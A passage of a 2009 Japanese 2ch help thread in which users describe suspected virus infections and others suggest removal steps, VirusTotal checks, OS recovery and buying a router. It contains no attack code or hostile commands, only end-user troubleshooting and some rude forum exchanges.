http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2001-062614-1754-99&tabid=3
の駆除方法に従ってなんらかの作業してみようとしましたが、
「4. レジストリから値を削除する」
の段階で指定されているサブキーが見つかりません。

どなたかご教示いただければ幸いです
559名無しさん@お腹いっぱい。sage2009/03/14(土) 12:01:58
>>558
マルチはダメ
http://pc11.2ch.net/test/read.cgi/sec/1235133157/528
560名無しさん@お腹いっぱい。sage2009/03/14(土) 12:16:17
>>559
なぜマルチが駄目なのか詳しく理由を

お礼を書けばいいじゃないですか?
561名無しさん@お腹いっぱい。sage2009/03/14(土) 12:29:05
>>560
マルチポストでぐぐれ
562名無しさん@お腹いっぱい。sage2009/03/14(土) 12:32:35
マルチポストが駄目な理由もわからんようなのが2cすんなよ。
563名無しさん@お腹いっぱい。sage2009/03/14(土) 13:28:41
カスどもが利用されるのは当たり前だろ
564名無しさん@お腹いっぱい。2009/03/14(土) 13:56:44
そりゃ当たり前だな
こいつらは利用されてなんぼ
565名無しさん@お腹いっぱい。sage2009/03/14(土) 14:02:27
その利用されて何ぼの奴からも拒否されるってのも大概だけどなw
566名無しさん@お腹いっぱい。2009/03/15(日) 11:29:32
昨日1rkの■5MBにも載っているロダで、元ファイル名***.jpg、
ロダのファイル名********.jpgをクリックしたら、エロサイトにつながって
ノートン先生が反応したのだが、これって何?
567名無しさん@お腹いっぱい。sage2009/03/15(日) 11:59:10
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】      『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】    『CPU: 1.6GHz 、メモリ: 756MB』  (「システムのプロパティ」参照)
【使用ブラウザ】  『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】     『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】  『ADSL』 例、光回線でルータ使用中

 『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
568名無しさん@お腹いっぱい。sage2009/03/15(日) 12:03:33
それもう秋田
569名無しさん@お腹いっぱい。2009/03/15(日) 13:23:07
そういわずに答えろよ
570449sage2009/03/15(日) 13:56:34
>>451
レスしてくれてサンクスです。削除したら問題ないんですね。
アクセス規制にまきこまれてレスできなくて遅くなりました。
571名無しさん@お腹いっぱい。2009/03/15(日) 15:11:39
Firefoxのアドオンと何かを入れてたフォルダが突然消えたわけだが
Avastインスコ済み
572名無しさん@お腹いっぱい。sage2009/03/15(日) 15:26:04
そうですか、それは大変ですね
573名無しさん@お腹いっぱい。2009/03/15(日) 15:30:24
そうですか、それは大変なんですよ
574名無しさん@お腹いっぱい。sage2009/03/15(日) 15:42:55
ご愁傷様です。

575名無しさん@お腹いっぱい。2009/03/15(日) 15:44:15
>>574
ご冥福のAAが貼られるかと期待したのに
576名無しさん@お腹いっぱい。sage2009/03/15(日) 16:07:13
>>567
これで漏れたやつはいるのかねぇ
577名無しさん@お腹いっぱい。sage2009/03/15(日) 16:16:35
板違い
578名無しさん@お腹いっぱい。sage2009/03/15(日) 19:18:07
>>577
失せろカス
579名無しさん@お腹いっぱい。sage2009/03/16(月) 20:46:09
【使用OS】 「WindowsXP SP2」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【ルータの有無】 「有り」

Setup.exeが入ったAutorun付きのISOファイルを実行してしまいました。Setup.exeをオンライン検索かけたら

http://www.virustotal.com/analisis/948191a9015bfdee7d25a54ebae84440

の結果になったのですが、これはどういったウィルスでしょうか?
Setup.exeをウィルスバスターで検索かけてもウィルスは検出されませんでした。
580名無しさん@お腹いっぱい。sage2009/03/16(月) 20:50:41
そのISOはどこで落としたのかな?
581名無しさん@お腹いっぱい。sage2009/03/16(月) 21:39:26
>>580
ttp://changi.2ch.net/test/read.cgi/download/1235461453/976
582名無しさん@お腹いっぱい。sage2009/03/16(月) 22:48:02
やっぱりか。
板違いだから帰れ。
583名無しさん@お腹いっぱい。2009/03/17(火) 20:59:20
お前が消えろ 死ね
584名無しさん@お腹いっぱい。sage2009/03/18(水) 10:09:05
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「avast最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybotとスパイブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」

スタートメニューに急に「elo114.exe」というメニューが出現してびっくりしています。
ウィルスかスパイウェアでしょうか?
間違えてダブルクリックしてしまったのですが何も起こりません。
585名無しさん@お腹いっぱい。sage2009/03/18(水) 10:24:44
最近、ExpListOutっていうソフト使わなかった?
586名無しさん@お腹いっぱい。sage2009/03/18(水) 10:33:55
>>585
レスありがとうございます。
使いました。
でもエラーが出て使えなかったので削除しました。
587名無しさん@お腹いっぱい。sage2009/03/18(水) 10:50:45
単にVistaの、最近使用したプログラムを簡単に実行できるようにするための機能だから問題ないし
もう使わないのであれば右クリックから消せる。
588名無しさん@お腹いっぱい。sage2009/03/18(水) 11:02:17
>>587
そうなんですね、安心しました。
ありがとうございました。
589名無しさん@お腹いっぱい。sage2009/03/18(水) 11:17:32
imac+xp sp3の環境です。
「rxicjjvn.dll」というdllが感染しているとの警告を受けたのですが
もう一台のxp sp3(PC機)にはこのような名前のdllは存在しません。
bootcamp特有のdllなのか、それともただのウィルスなのか判断できません。
皆さんのwindows\system32にもこのようなファイルがありますか?
削除しても大丈夫なのでしょうか?
GGっても出てこないので質問させて頂きました。
宜しくお願いします。
590 ◆N9P3SuvBPo sage2009/03/19(木) 16:46:08
>589
レス遅れた、すまない。
PC2台所有してるのですね。
macとXPのデュアルブート環境で、「rxicjjvn.dll」というファイルが感染してるんですね。
どうみてもこんなランダムな名前のファイル、通常は存在しない。
ウイルス名は分からないの?
591589sage2009/03/20(金) 01:14:40
>>590さん
お世話になります。
kaspersky&symantecのonlinescanではtrojan clickerって診断されているのですが
悪意のあるソフトウェアの削除ツール&bitdefenderでは反応なしです。
恐らくウィルスであることは間違いないと思うのですが
削除してしまっても問題ないのかが気になります。
unlocker1.8.7で該dllのwinlogon.exeでの使用(?)は切れたのですが
explorer.exeでの使用(?)を切るとwindows\system32フォルダがフリーズしてしまいます。
590さんの環境下で存在しないdllの様なので、削除しても、os自体が立ち上がらないような
重要なものではなさそうですね。
削除して、少し様子を見てみます。

お気遣い頂き有難う御座いました。
592 ◆N9P3SuvBPo sage2009/03/20(金) 07:23:40
>591
補足しておくと、ファイルのプロパティというのを見れば
正規のファイルか、悪意のあるファイルかは区別が付きます。
593名無しさん@お腹いっぱい。sage2009/03/20(金) 15:58:59
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】      『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】    『CPU: 1.6GHz 、メモリ: 756MB』  (「システムのプロパティ」参照)
【使用ブラウザ】  『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】     『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】  『ADSL』 例、光回線でルータ使用中

 『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが

594名無しさん@お腹いっぱい。sage2009/03/21(土) 16:39:44
USBカメラについてたドライバいれたら、NODでウイルス反応が出たんですけど、
Nortonでは無反応でした。
どっちが正解なのか分からないのですが、調べる方法はありますか?
595名無しさん@お腹いっぱい。sage2009/03/21(土) 22:03:11
>>594
virustotalに投げてみ。
 http://www.virustotal.com/jp/

こんな感じで、色んなウイルス対策ソフトで判定してもらえる。
 http://www.virustotal.com/analisis/0727323358fc1e8d963d8cc7f9c422c6

真性ウイルスだと複数(大抵5個以上)のソフトでウイルス判定される。
自分で判断できなかったら、スレに上記と同じようにアドレスを貼って、他の人にも意見を聞いてみる。
596名無しさん@お腹いっぱい。sage2009/03/21(土) 22:04:31
>>594
自己判断するしかないのだかvirustotalにファイルを上げてみては。
代理店はキヤノンだっけ?時間がかかるだろうが検体送ればry
597596sage2009/03/21(土) 22:06:45
ありゃりゃ、被っちまったぃw
598名無しさん@お腹いっぱい。sage2009/03/21(土) 22:14:32
以前使っていたけど、NODは誤検出が多いすね。提灯テスト結果と違って。
599594sage2009/03/22(日) 00:19:42
レスありがとう御座います。
さっそくやってみました。
以下の結果がでたのですが、これは黒ってことでしょうか?
http://www.virustotal.com/jp/analisis/780660f8f8a2d1bb6ccfaac06798d8fa
http://www.virustotal.com/jp/analisis/07330a21a32bbf32208b8e8f2bf648a4
600595sage2009/03/22(日) 00:51:28
>>599
これはかなり珍しいパターンだね。メジャー所がみんな取りこぼして(検知していない)、マイナー所が複数検知してる。
このパターンアド誤検出の可能性も残るが、俺はほぼ黒と見ました。

買ったばっかりの物にウイルスが入っていたのなら、念のためUSBカメラのメーカーにメールした方が良いかも。
(NODで検知したことと、virustotalのアドレスを貼り付けてメール)


あと、検出結果のページの日付が少し古いので、既に他の人が一度解析している。
最新の情報が欲しい時は、ファイルを送った後に、『ファイルの再解析』ボタン(右側)を押すと、
最新の解析結果がもらえるので、気になるなら再解析してからメールすると、なお良い。

601595sage2009/03/22(日) 00:53:17
>>600
おっとっと、書き間違い。

× このパターンアド誤検出の可能性も残るが
○ このパターンだと誤検出の可能性も残るが
602名無しさん@お腹いっぱい。2009/03/22(日) 10:54:33
シマンテックの配付ファイルが原因でGoogleポインズニングにまで発展
http://antivirus-news.net/2009/03/googlesymantec.html
>この事件は、セキュリティベンダーの社会的責任が非常に重いことを意味するものと言えるだろう。

wwwwwwwwwwwwwwwwwwww
603名無しさん@お腹いっぱい。sage2009/03/22(日) 11:32:46
>ESET社(NOD32、ESS)のサイトが
>中華にクラックされウイルスを仕込まれた
>ttp://www.avertlabs.com/research/blog/index.php/2007/10/11/nod-to-more-arp-mayhem/
>(隠蔽しているのでMcAfeeブログより)
>
>公式サイトでウイルス貰えました。

セキュリティベンダーの公式サイトで、
ウイルス配布している所もあったしさ。orz
604名無しさん@お腹いっぱい。2009/03/23(月) 08:55:48
いきなりミッ○ーマ○スのテーマが流れだして1分位で止まった
とりあえず隠しファイル含めた履歴全部消してみたけど・・・
何のウィルスこれ?俺のパソコン大丈夫ですか?
605名無しさん@お腹いっぱい。2009/03/23(月) 09:20:08
おそらくミッキーマウスマーチの音楽ファイルを再生しただけですよ。
問題ないです。
606名無しさん@お腹いっぱい。sage2009/03/23(月) 09:27:40
ソフトウェアの脆弱性を利用され、PCを遠隔操作された
その曲を指定した時間、又は何か特定の操作をしたら流すマルウェアに感染した
あなたがその曲をプレイヤ−に入れていて、何らかの操作により再生された
あなたの家族や友人が指定した時間、又は何か特定の操作をしたら流すように設定した

せめてテンプレくらい埋めてくれないとなんとも・・・
607名無しさん@お腹いっぱい。2009/03/24(火) 03:46:21
HDDの中の画像ファイルを検索して破壊するようなウィルスはありますか?
608名無しさん@お腹いっぱい。sage2009/03/24(火) 04:01:59
>>607
原田君ですか?
あるかと聞かれれば「ある」。
609名無しさん@お腹いっぱい。2009/03/24(火) 11:36:46
端末が100台程ある社内LAN環境で、Windows Severの脆弱性を悪用したウィルスに感染したマシンが発生し、一気にウィルスが広まりました。
LANは外部とは一切繋がっておらず、恐らくUSBメモリから感染したと思われます。

USBメモリは決まった物しか使用してはならない決まりですが、個人持ちも使おうと思えば使えます。
が、誰も自分が使ったとは言いません。

OSはWin2000、スキャンソフトはMcAfee、パターンファイルは一部のマシンがまったくアップデートしておらず、
MSから出しているOSの脆弱絡みのパッチは一切適用していない環境です。

パターンファイルが適用されているマシンは、バッファオーバーフローを検知し、怪しげなbatファイルの実行も検知しました。
フルスキャンをかけるとSYSTEM32下の一部EXEがウィルスに感染していました。

パターンファイルが適用されていないマシンは感染ファイルをばらまき、OSの脆弱を利用したアタックを他のマシンにかけていました。

長々と書きましたが、感染源(PC)を特定する良い方法などありますでしょうか?

皆さんのお知恵を貸して下さい。
610 ◆N9P3SuvBPo sage2009/03/24(火) 23:38:23
>609
特定とかより、感染しているPCに入ってる重要なデータを退避させて
クリーンインストールを行なうことを奨めます。
企業では特定するより、被害の拡大を如何に早く食い止め、如何に早く復旧できるかの問題ですからね。
611609sage2009/03/25(水) 07:54:51
>>610
幸い対策はすぐに取れたのでそちらの心配はないのですが
上への報告が必要なので…
612名無しさん@お腹いっぱい。sage2009/03/26(木) 10:11:16
世間は本当に不況なんだよなぁ。
幸い俺の所は不況知らずで、最近も20人程外向さんを雇ったんだけど
いつもは面接で顔を見た瞬間駄目だというやつが多かったが
今回はまともな人間がすぐに揃ったよ
613名無しさん@お腹いっぱい。sage2009/03/26(木) 10:12:22
すいません。間違えました。
614名無しさん@お腹いっぱい。2009/03/28(土) 02:35:28
・パソコン起動するたびにMicrosoftUpdateの自動更新がオフにされている。
・Micorosoft、トレンドマイクロ、シマンテックなどの公式サイトがブラウザで見れない。

このような影響のあるウィルスってありますか?
これってやっぱりウィルスのせいなんでしょうか・・・
615名無しさん@お腹いっぱい。sage2009/03/28(土) 05:21:23
マルウエアだと思うよ
616名無しさん@お腹いっぱい。sage2009/03/28(土) 09:17:24
特定のホームページが読み込みエラーになるようなウィルスっていますか?
試したところ、
・マイクロソフト
・シマンテック
・トレンドマイクロ
は読み込みエラーになってしまいます。
以前は見れていました。他のHPは表示できています。
617名無しさん@お腹いっぱい。sage2009/03/28(土) 09:20:37
【使用OS】 Vista
【Microsoft Update(MU)の状態】 してます
【使用セキュリティソフトとバージョン】 avast最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Widowa Defender
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有

スタートアップに services.exe が登録されていました。製造元は不明と表示されています。
コマンドは、C:\Users\******r\AppData\Local\services.exe
(正規のservices.exeはsystem32フォルダにあると聞きました)

タスマネから見ると、ユーザー名がsystemで説明が「サービスとコントローラアプリケーション」と書いてあるservices.exe
ともうひとつ

怪しいと思っている、services.exeがあります。
それが、ユーザー名****** 説明は、「services.exe」です。

2種類ありました。片方は正規?のsystem32関連だと思われるのですが
もうひとつがわかりません。ググるとマルウェア?ウイルス?など
あまり良いことは書いてありませんでしたので、質問にきました。
618名無しさん@お腹いっぱい。2009/03/30(月) 22:19:16
>>617

http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-011616-5036-99&tabid=2

これだと思いますが、どうでしょう?
619名無しさん@お腹いっぱい。sage2009/03/31(火) 06:33:27
>>618
617です。情報ありがとう。
でもシマンテックのHPが見れないので、そのアドレスも表示できないんです。
どうすれば。。。(^_^;)
620名無しさん@お腹いっぱい。sage2009/03/31(火) 06:49:20
もしかして、マイクロソフトのサイトも表示できなかったり?
だとしたらリカバリしかない。そういうウィルスだから
621名無しさん@お腹いっぱい。sage2009/03/31(火) 12:56:07
マイクロソフトも表示できないです。
とりあえずOS入れ直す方向で考えて見ます。
情報ありがとうです。
622名無しさん@お腹いっぱい。2009/03/31(火) 22:45:38
>>619

>でもシマンテックのHPが見れないので

あ、ごめんね。

えーっとHPより抜粋するに

1. セーフモードで起動して
2. 該当のファイルを削除して
3. 下記のレジストリを消せば大丈夫だと思われます
HKEY_CURRENT_USER¥Software¥Microsoft¥Windows¥CurrentVersion¥Run¥"[ランダムな名前]" = "[トロイの木馬へのパス]"

注意: [ランダムな名前] は、次のリストから得られてます。
CrashDump
EventLog
Init
lsass
Regscan
RunDll
Setup
Sound
svchosts
System
TaskMon
UPNP
Windows

がんばって!
623名無しさん@お腹いっぱい。sage2009/04/01(水) 00:19:14
>>620
嘘は良くない
ちゃんとレジストリ修復で修復可能
624名無しさん@お腹いっぱい。2009/04/01(水) 01:05:40
レジストリ修復?
平たく言うと?
リンク切れのことか?
625名無しさん@お腹いっぱい。sage2009/04/01(水) 02:00:30
つか、セキュリティーソフトのベンダーに繋がらないのってマルウエアの症状そのものじゃん。

SUPEPAntispywareを使うといいよ。
CCCクリーナーも意外に頑張ってくれるから(完治ではないが多少は緩和する)試してみるといいかも。
626名無しさん@お腹いっぱい。age2009/04/02(木) 00:26:19
リカバリについて教えてください。

パソコン購入時に付いてきたCD-ROM 2枚あるのですが

マイクロソフト オフィス パーソナル エディション 2003
というのはリカバリディスクではないのでしょうか?
ウイルスに感染しているのが確実なようでウイルスのサイトは表示されません。
取説を読むとリカバリディスクは付いていないと書いてあります。
リカバリ手順は調べたのですがディスクは?というところで止まってしまいました。

よろしくお願いいたします。
627名無しさん@お腹いっぱい。sage2009/04/02(木) 00:37:59
>>626
一枚はワードとかエクセルですね。
もう一枚はその他の付属ソフトかな…?
もしかして冊子なくしたのかな?

とりあえず
1.PCメーカ名
2.使用PCの型番
を書きましょう。
628627sage2009/04/02(木) 00:43:56
すまない「取説」あるんだ。
それにリカバリ方法がないのなら
他の冊子に乗っているかと。
付属本は(2〜3)冊あると思うよ。
629名無しさん@お腹いっぱい。age2009/04/02(木) 01:04:07
>>626です


ありがとうございます。

SONYのVAIO

PCV-W702B/W502B

です。

かなり前、Win95や98の頃リカバリはやったことがあるのですが…今回はXPでさらに感染が確実なようでウイルス対策をしていなかったことを後悔しています。
630627sage2009/04/02(木) 01:17:00
ttp://dlv.update.sony.net/pub/vaio/download/man/4682290011.pdf
"リカバリディスク作成/リカバリ"参照して
631名無しさん@お腹いっぱい。age2009/04/02(木) 01:18:14
>>626です

取説にリカバリディスクを入れると書いてあるのですが
リカバリディスクの存在が不明!?なのです。

購入時に付いていたものは全部とっておいているはずなのですが
取説によると付属のCDは先の2枚のようで、リカバリディスクは
使用前に自分で作るか有償と書いてあります。
自分では作成しておらず、オンラインのユーザー登録も
していませんでした。昔と違ってリカバリディスクというのは
付属ではないということなのでしょうか?
632名無しさん@お腹いっぱい。age2009/04/02(木) 01:28:14
>>630

>>626です


教えて頂きありがとうございます。
携帯から見ようとしたのですが容量が大きく見れないようです。
後でパソコンで見られたら良いのですが全体的に
調子が悪く見られるかわかりません。
また結果をご報告させていただきますね。
遅い時間にありがとうございます。
633627sage2009/04/02(木) 01:31:27
先に示したリンク先の180ページ"C:ドライブのリカバリ"を実行したあとに
セキュリティソフトインストール>Office等インストール>Windoes Update
>Dドライブ以降のフルスキャン
"Dドライブ以降のフルスキャン"これ大事。

リカバリディスクの作成方法もリンク先に載っているね。今回は上記の方法で再セットアップ
したあとでリカバリディスクの作成をしておこう。
634名無しさん@お腹いっぱい。age2009/04/02(木) 01:38:46
>>627

ありがとうございます。明日にでもレスいただいた手順でやってみたいと思います。
635627sage2009/04/02(木) 01:40:38
見られないのか…
ディスクを作成していないとOSを立ち上げた状態からリカバリするしかないみたいだ。
スタート>すべてのプログラム>VAIOリカバリツール>VAIOリカバリユーティリティ
後は"OK"とか"次"をクリックしていけばOK
636627sage2009/04/02(木) 01:50:16
そうそう、ルータがない場合セキュリティソフト(PFW付き)をインストールするまでは
絶対にネットにつないではいけないよ。
637名無しさん@お腹いっぱい。sage2009/04/02(木) 02:39:48
http://www.alpha-net.ne.jp/users2/knight9/m.htm
このアドレスは無限回廊って犯罪の有名なデータベースサイトなんだけど、
自分のパソコンじゃ反応しないのに知り合いのパソコンはウィルスに反応したって言われた
これってどうなのか教えて下さい

【使用OS】 winXp
【Microsoft Update(MU)の状態】 自動にしてる
【使用セキュリティソフトとバージョン】 avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 
【ルータの有無】 有
638名無しさん@お腹いっぱい。sage2009/04/02(木) 09:12:42
一通り回ってきたけど、Aviraでは無反応。
どこで反応したかは分かる?
639名無しさん@お腹いっぱい。sage2009/04/02(木) 13:41:41
ウィルスバスタ2009で検索かけてみたらウィルス発見しました
2つあって名前はそれぞれVBS PSYME.CTEとHTML WEBKIT.AIというみたいなんですが
処理状況が「対処できないウイルスに感染したファイルが、感染の拡大を防ぐために隔離されました。」と出ていて
これはつまり完全には駆除してませんよ。という意味で、まだPC内に存在しているということでそゆか
もしそうなら処理方法を教えてほしいです
640名無しさん@お腹いっぱい。sage2009/04/02(木) 14:51:09
>>639
その手のマルウエアはリアルタイム検索で(サイトを開いたとき)
検出されるのが普通で、windoes update やflash player等の脆弱性がなければ感染しない。
今回検出されたファイルはウイルスそのものなので駆除(正常なファイルに戻す)ことはできない。
隔離されたファイルを削除すればよい。(その後、念のためフルスキャン)
VB2009は使用したことがないので操作手順はわからないが、右下のバスターアイコン(カプセルマーク)から
操作設定画面をたちあげて処理することになる。
昔のバージョンと同じなら隔離されたファイルはこの中にある。
C:\Program Files\Trend Micro\Virus Buster 2009\Quarantine

正規ユーザーなら、本家のヘルプ見てもわからない場合サポートも含めた料金を払っているのだからサポートに聞きなさいよと。
641名無しさん@お腹いっぱい。sage2009/04/02(木) 15:18:32
PC買ったときについてきたバスタ2008を入れたら
入れる前と比べてかなり重くてアンインスコ
その後何も入れてないんだが何か入れたほうがいいだろうか?

ブラウザはfirefoxでWindows Defenderがある
ごくたまにWindows Live OneCare PC セーフティで(これはIE
スキャンするも毎回感染なし
642名無しさん@お腹いっぱい。sage2009/04/02(木) 15:30:31
お前がそれでいいんならいいなじゃないの?
アンチウイルスの常駐とFWは最低限入れろっても、どうせ重くなるっていいだすだろうしな。
643名無しさん@お腹いっぱい。sage2009/04/02(木) 15:34:47
FWはネトゲする時以外はすべての着信接続をブロックにするにしてる
644名無しさん@お腹いっぱい。sage2009/04/02(木) 15:58:31
>>638
んー、ちょっと分かんないですね…
すいません…
645名無しさん@お腹いっぱい。sage2009/04/02(木) 16:30:15
Hotmailを今日チェックしようと思ってIEで開いたらクッキーに残してあったアドレスが全然違うものになってました
babbあっとxx.しーおー.jpになってたんですがこれってウイルスか何かですか?
アドレスはもちろん全部半角英数だったんですが「xx」ってなってるのが気になって
ググってもわかりませんでした
646626age2009/04/02(木) 18:19:34
>>627

>>630の手順でセキュリティソフトのインストールまできましたが
続きができません。
リカバリ前に無料のオンラインスキャンもサイトが表示されないので
ウイルスバスター2009を買ってきたのですが、ソフトを入れたら

ウイルスバスター2009インストーラ

セットアッププログラムは、必要なサービスパック
がこのコンピュータのウィンドウズXPに適用されていないことを
検出しました。
【ウィンドウズアップデートの実行】を
クリックして、サービスパックをダウンロードしてください。


と出ています。リカバリ前には、それでもアップデートしようと
しましたが、やはり表示されませんでした。
ウイルスをスキャンや駆除しようとするのを妨害するかのように…。

先程、Cドライブをリカバリ→
(取説の流れで)Office等インストール→ウイルスバスターの
ソフトを入れたら上記のように出ました。

まだネットに繋いではいけないのにアップデートをしなければ
いけないということですよね?
ここでまた止まってしまいました。(泣)

光で1台しかなく困っています。
また教えていただけましたら助かります。
よろしくお願いいたします。
647名無しさん@お腹いっぱい。sage2009/04/02(木) 18:37:43
一回ネットに繋いでSP2なり3なり適用すりゃいいじゃん
バスターなんか買ってる時点で終わってるけど・・・
648名無しさん@お腹いっぱい。sage2009/04/02(木) 18:39:36
光でルータ無いの?
ルータが有ればネットに接続しても大丈夫だよ。
649627sage2009/04/02(木) 20:26:08
バスター2009の作動条件がSP2以降等のためインストールできないのでしょう。
一番良いのはnecとかbuffaloの"ブロードバンドルータ"を購入することなのですが…
バンドルされているノートンとかバスターの試用版があると仮定して話をすすめます。
試用版(PFW付が条件)をインストール>windoes update>試用版アンインストール
(通常のアンインストール後、ノートンの場合専用のアンインストーラをシマンテックのサイトから
落として実行)>バスター2009インストール

ノートン・アンインストーラー
ttp://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20050415150354953

650名無しさん@お腹いっぱい。sage2009/04/02(木) 20:46:14
クリーンインスコしたんならうpだての間ノーガードでもたいして問題ねーだろ
651 ◆N9P3SuvBPo sage2009/04/02(木) 21:32:27
>650
本気で言ってるんですか?
ルータ無しでSP2以前のXPや2000でネットに繋いだら数分で終わるぞ。
ネットサーフィンしなくても勝手に入ってくるから。
652名無しさん@お腹いっぱい。sage2009/04/02(木) 21:34:11
アホかw
その後すぐバスター入れてフルスキャンするんだろーがw
653名無しさん@お腹いっぱい。sage2009/04/02(木) 21:45:51
感染してからセキュリティソフト入れたって無意味っすよ
654名無しさん@お腹いっぱい。sage2009/04/02(木) 21:48:17
なんのためのクリーンインストールやらw
655 ◆N9P3SuvBPo sage2009/04/02(木) 22:00:31
>>649
もう一回リカバリ作業が必要になりますが、このサイトからSP2インストールCDを入手してください。
ttp://www.microsoft.com/japan/windowsxp/sp2/default.mspx
注文方法はどっちでも構いませんが、お奨めはFAXによる注文ですかね…

CDが届いたらリカバリしてSP2をインストール、バスター2009インストール、WindowsUpdateという手順を踏んではどうですか?
656627sage2009/04/02(木) 22:11:41
>>655
私にレスされても…w
1000円ちょっとですがFAXしたり届くまで時間かかりそうだし…
私なら安物でもよいからルータ買いますね。
657 ◆N9P3SuvBPo sage2009/04/02(木) 22:19:54
>656
うぎゃあ!!
質問者の方と勘違いしてしまいました…
658626age2009/04/02(木) 23:43:40
>>627

>>655

ありがとうございます。
ウイルス対策やアップデートもせずにいたことを反省しています。

オンラインで何もできないのなら製品版しかないのかと思いまして
購入しましたが一人では解決できず、またパソコンはそれしかないので
調べることもできません。教えて頂きまして本当に助かります。
プロバイダは感染の可能性を教えてくれるまでですし、
皆さんはバスターなんてと書いておられましたが量販店では
オススメとのこと…。
パソコンメーカーに聞けば?とも言われたりしたのですが
オンラインのユーザー登録もしていなかったので繋げない今は
ここで親切に教えていただけてとても嬉しいです。

ルータは使ったことがないのですが先にあげていただいたのが
オススメなのでしょうか?
光で今後も1台のみ利用の予定です。

よろしくお願いいたします。
659627sage2009/04/03(金) 00:47:35
>>658
私見ですが"お店のお勧め"="良い製品"とは限りません。
"お店のお勧め"="捌きたい製品"のときもあります。
上記はバスターを批判しているわけではありません。すべての商品に対しての私見です。

最近のセキュリティソフトはそれなりにメモリを積んでいないと辛いです。
XPなら最低512Mはほしいですね。

ネットでの製品情報も(個人のブログ含め)さくらの書き込みがないとはいえないことも念頭に入れてください。
その上で価格コムの有線ルーター 満足度ランキング(10000円以下)を5位までかいておきます。
満足度5.00が満点
2004年 7月下旬発売 バッファロー BHR-4RV 最安値:\7,216 満足度4.72 採点人数5人 口コミ件数 347件
2007年 8月下旬発売 IODATA ETX-R 最安値:\2,370 満足度4.12 採点人数17人 口コミ件数 309件
2003年10月下旬発売 バッファロー BBR-4HG 最安値:\4,329 満足度3.58 9人 口コミ件数 3061件
2006年 2月上旬発売 IODATA NP-BBRL 最安値:\2,483 満足度3.27 6人 口コミ件数 774件
2007年 6月下旬発売 COREGA CG-BARFX3 最安値:\2,483 満足度2.43 3人 口コミ件数 73件



660626age2009/04/03(金) 01:23:42
>>627

丁寧に教えて頂きありがとうございます。

私などは量販店のオススメもパソコンと同時購入で1000円引きなど
これが売りたいんだなと伝わってきてもオススメを買って
しまう無知で いつまでも初心者なのです。
ルータも多分、満足度が高い評価のものを選んでしまうと思います。。。

早速、明日お店に行ってみます。
661名無しさん@お腹いっぱい。sage2009/04/03(金) 01:47:12
今後はこれも検討すると良いかも
ttp://www.microsoft.com/japan/windows/products/winfamily/sharedaccess/default.mspx
662名無しさん@お腹いっぱい。age2009/04/04(土) 13:44:53
http://www.geno-web.jp/
このページは安心ですか?
663626age2009/04/04(土) 22:55:51
>>627様、教えていただいた皆様、ありがとうございました。

サービスパック3、バスターでスキャンできました。
リカバリディスク作成はこれからになります。

こちらで親切に教えて頂き本当に助かりました。
これからも質問される方のためにレスしていただけたらと思います。
私も少しずつですが自分でも勉強していこうと思います。
重ね重ねありがとうございました。
664627sage2009/04/05(日) 00:21:57
>>626
直ってよかったね。
PC使えないと情報収集が困難だからね。
数年前のバスターと今月のカスペは「祭り参加者」にならずにすんだけど…
カスペのはPC使用不能まではならないものの…あせるだろうな。
一歩間違えば被害当事者だ。 ベンダーさん、しっかりしてくれ〜
665名無しさん@お腹いっぱい。2009/04/05(日) 16:09:13
こちらで質問するよう誘導されてきました。マルチではありません、よろしくお願いします。

【使用OS】 XP SP2
【Microsoft Update(MU)の状態】 有
【使用セキュリティソフトとバージョン】     ウィルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 常に更新しています
【スパイウェア対策ソフト】 スパイボット clam(非常駐)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 常に更新しています
【ルータの有無】 有

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
検出されたのはAdware memwatcherというものです

昨日インターネットを高速化しようと思い、InternetAcceleratorSPというフリーソフトをいれました。
するとウィルスバスター2009で検索したところ、スパイウェアは101個検出されました。
未解決の脅威の検出数101、処理数101です。

いつもは検出したらすぐ削除されるのですが、今回は全て隔離になっていました。
これは一体どうすればいいのでしょう?
最悪リカバリも覚悟していますが、InternetAcceleratorSPというフリーソフトというフリーソフト自体削除した方がいいのでしょうか?
窓の社などで紹介されていたので信用していたのですが・・

